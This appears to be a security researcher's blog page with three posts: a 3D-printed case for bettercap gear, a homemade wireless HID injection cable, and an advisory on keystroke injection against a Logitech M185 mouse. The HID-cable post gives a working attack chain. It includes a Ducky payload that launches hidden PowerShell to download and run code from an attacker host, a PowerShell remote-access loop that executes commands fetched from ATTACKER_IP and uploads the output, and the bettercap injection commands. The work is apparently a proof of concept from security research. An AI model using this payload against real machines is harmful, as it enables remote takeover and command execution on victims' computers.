David Sopas – Web Security Researcher

bettercap

27/08/20 Hardware , Tools # , , , , , ,

I printed a 3D box for my bettercap arsenal and I liked it

I printed a 3D box for my bettercap arsenal and I liked it

Looking at the title you might think that it’s Katy Perry new hit… It isn’t… I’m sorry…

One of my favourite tools when doing security assessments is bettercap. Its like “one tool to rule them all”. With that in mind, I needed something to carry my bettercap arsenal when going to a client. Using my self-taunted 3D skills (btw n00b level) I decided to design my own box.

I needed something to pack the following:

The first version I encounter some issues. It was too big; alfa card was a bit tight; lid didn’t closed correctly and not very appealing.

So I started working on my second version which I would reduce a bit by putting the slot for the two antennas (Alfa card and the CrazyRadio) and modify the BLE dongle slot to also reduce some space. Added 4 pinouts to better close the lid.

I was getting close of what I needed neitherless I wanted more specially because I had an hard time taking the antennas and the BLE dongle. Also, the pinouts were not a good option to accomodate the lid. So I decided to add a few things:

  • Small cuts to improve the removal of the antennas and the BLE dongle
  • New slot to put whatever I needed – you never know…
  • New lid that just slides into the box

And what about the lid? Besides helping to open – creating some friction –  its leet 🙂

If you are interested in printing it, I uploaded it to Thingiverse and feel free to ping me on Twitter for suggestions or modifications.

Have fun!

no responses
27/12/19 Hardware , Tips and Tricks # , , , , , ,

Gone in 30 seconds – a HID cable story tale

Gone in 30 seconds – a HID cable story tale

Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.

On the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):

And cut one of the sides of a random USB cable:

Split the wires:

Removed the cap from the Logitech receiver:

Solder (really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) into the receiver:

Put the USB connector cap on:

Add a nice plastic USB enclosure to make it more real:

All the process was fast, I took around 5 minutes to cut, solder and super-glue all together. In the end I think it could be better, specially when I rammed the USB connector with a knife.

For the second part it took a little more because I wanted to use another alternative to the existing HID cables – so I went with CrazyRadio + Bastille firmware and a final touch of bettercap HID module to send my Ducky payload. I wanted to take advantage of what I had and that’s it.

This is basically a walkthrough of what I did:

  • Write down the MAC address of the device (using HID.recon from bettercap or by checking the properties of the device – this will depend on your OS)
  • Write your Ducky payload – in this PoC is just a reverse shell to my VPS
DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/ps.txt')"
ENTER
DELAY 750
function getUser() {
    $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}
 
function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}
 
$resp = "http://ATTACKER_IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
    $r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);
 
    while($r_get) {
        $output = invoke-expression $Ds | out-string
        $w.UploadString($resp, $output)
        break
    }
}
  • Connect the HID cable on the Windows victim machine (don’t forget that the payload will be OS dependable)
  • Start your listener on the attacker machine
  • Connect CrazyRadio and start bettercap
bettercap -eval="hid.recon on"
hid.inject MAC PT ducky.txt

And its basically game-over.
I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.

In the process of creating this HID cable with “leftovers” I learn a few things:

  • Some Logitech Unifying receivers are not vulnerable to some known attacks – like keystroke injection;
  • Be careful when putting solder on the USB contacts. Just put a small amount and spread it slightly with your iron, that way the PCB will fit better on the USB connector;
  • Do a first run on a USB hub just to make sure you don’t burn your laptop port or something;
  • Don’t waste money buying expensive HID cables (specially when ripped from others) when you can make your own for less that $10;
  • Last point, don’t keep your brain focused on doing what others do and don’t be afraid do fail at first. Be persistent and never quit.
no responses
18/03/19 Advisories , Hardware # , , , ,

Popular wireless Logitech mouse vulnerable to keystroke injection

One of the things that keeps me on the security path is the opportunity to learn new things each day.
After seing the new update on Bettercap – which supports HID (Human Interface Device) – I decided to read about it – specially on MouseJack keystroke injection attacks.

I went throught the affected devices list and didn’t have any on my own to test it. BUT I had a Logitech M185 wireless mouse which is very popular because… it’s cheap comparing to other models.

I grabbed the CrazyRadio dongle – which was waiting for better usage on my lab –  and put it into action.

I opened Bettercap and turn on the HID recon:

sudo bettercap -eval="net.recon off;hid.recon on"

After a while I detected my Logitech M185 and also other stuff:

Just to make sure it was really my device, I did a simple HID.sniff ADDR and pressed a few buttons. Don’t want to pop shells anywhere 🙂

Next, I created a simple DuckyScript to show the Windows calcultator on the desktop:

GUI r
DELAY 200
STRING calc
DELAY 200
ENTER

What we have so far:

  • Bettercap running with HID module on
  • Detected my Logitech M185 2.4Ghz mouse
  • Created the DuckyScript to use (ducky.txt)

The only thing missing is to inject our payload and see what happens:

hid.inject ADDR PT ducky.txt

You can see the end result of this proof-of-concept video – https://www.youtube.com/watch?v=TdPRYWkYarM

Don’t want to be a spoiler but… yeh it’s vulnerable 🙂

no responses